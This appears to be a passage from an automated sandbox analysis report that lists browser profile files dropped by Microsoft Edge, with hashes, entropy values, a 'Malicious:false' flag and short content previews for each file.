                                                                                                                                                                                                                                                                                          SHA-512:61248E3745D1A124FDFAA22B5F2C2F348A9D9EEB6973B2A6150C6431E4FF325AD06BD9986BFC650B040FB589E62E04DB34843F0A588B126BA12418BDCEA3F217
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....z................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":781}.!_https://ntp.msn.com..LastKnownPV..1734597969733.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734597970855.._https://ntp.msn.com..MUID!.08F1B41B03E76B2C0A73A14102FE6A7B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734597969800,"schedule":[-1,9,24,-1,-1,-1,25],"scheduleFixed":[-1,9,24,-1,-1,-1,25],"simpleSchedule":[44,13,51,23,20,10,50]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734597969705.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241218.370"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.251865036550899
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+Tcwt8a2jMGIFUt8O8RogSZmw+O8RoeVkwOcNwi23oH+TcL:7pLvLZYeb8EFUt8OpgS/+Opu54ZYeb8N
                                                                                                                                                                                                                                                                                          MD5:CC9EBF68055F151DA9FA5EBA8BA4D5DD
                                                                                                                                                                                                                                                                                          SHA1:CB5584B3650602B11E9CB7FC49A2E5F3DC9551DF
                                                                                                                                                                                                                                                                                          SHA-256:49C3AA4E20798404D8B59762E2FF7C95AA938BC39886ED0BA6FC10B347D82746
                                                                                                                                                                                                                                                                                          SHA-512:5CCEB1037084BBF0A06751C419CFA60276B7B961BDE894C27FF3088A3818A885C451A2D645902EB47EE544B229CF22899EC24DB59700058C4E394169C9298AB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.116 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.117 788 Recovering log #3.2024/12/19-03:45:53.145 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.251865036550899
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+Tcwt8a2jMGIFUt8O8RogSZmw+O8RoeVkwOcNwi23oH+TcL:7pLvLZYeb8EFUt8OpgS/+Opu54ZYeb8N
                                                                                                                                                                                                                                                                                          MD5:CC9EBF68055F151DA9FA5EBA8BA4D5DD
                                                                                                                                                                                                                                                                                          SHA1:CB5584B3650602B11E9CB7FC49A2E5F3DC9551DF
                                                                                                                                                                                                                                                                                          SHA-256:49C3AA4E20798404D8B59762E2FF7C95AA938BC39886ED0BA6FC10B347D82746
                                                                                                                                                                                                                                                                                          SHA-512:5CCEB1037084BBF0A06751C419CFA60276B7B961BDE894C27FF3088A3818A885C451A2D645902EB47EE544B229CF22899EC24DB59700058C4E394169C9298AB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.116 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.117 788 Recovering log #3.2024/12/19-03:45:53.145 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1d93bf34-87c5-4951-b6e5-e3434b13746d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1618
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                          MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                          SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                          SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                          SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5e302363-1b86-4d90-9135-f37bc81447bc.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6e43ad32-7d0a-4d7a-9e4c-b6dd0f73ab59.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7719300861292164
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:tTto9zEPUUS8TVZZeERIAuhmsAp1dpDXcf0L/ZJVb:VtpUronZeuIAamsATDXI0LhJVb
                                                                                                                                                                                                                                                                                          MD5:DC890A3082A083BB8469F6B330258B22
                                                                                                                                                                                                                                                                                          SHA1:75EC75C7DE3BDEB8793913344F22EC0B2EEF9F39
                                                                                                                                                                                                                                                                                          SHA-256:083F5B13CA3CA92CD62CC2BE8E100AB112C38DA341A1B50F72AEB80565E2FBA6
                                                                                                                                                                                                                                                                                          SHA-512:518429FEE458094E6AF55493CED5EC9A99859A8C48D0880CEBC1E99AFCE90E0BC1E1952CD5B003CA333907EF3F5B94754C1CF513A983E33632FDFEBEAB4DDCC1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1618
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                          MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                          SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                          SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                          SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.3768206827965745
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSNWd:JkIEumQv8m1ccnvS4ALDHlGFh57QBw1a
                                                                                                                                                                                                                                                                                          MD5:B117340B26A5B669E1D319D60BB214E3
                                                                                                                                                                                                                                                                                          SHA1:29730BD0136E0F90163DD30E94868772EF7BAC25
                                                                                                                                                                                                                                                                                          SHA-256:462C13F9140F96DC1C864AFC33ABDC28A9A9444631032A6EF41FB8E7264FD860
                                                                                                                                                                                                                                                                                          SHA-512:8A4B743A052A3853863D535F510E476EE2815DD6D533F8E8A74B5C517BE5148A36AEE9D5EA27103123C24E64B4CFD543D0383A12811F585F62CB54D3214F3754
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2c70f.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2e536.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b2f6100a-1a1c-4ff1-8b5f-84d9609695da.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\de943a9d-0dd0-4a84-b2f9-18333193ea57.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3127f.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

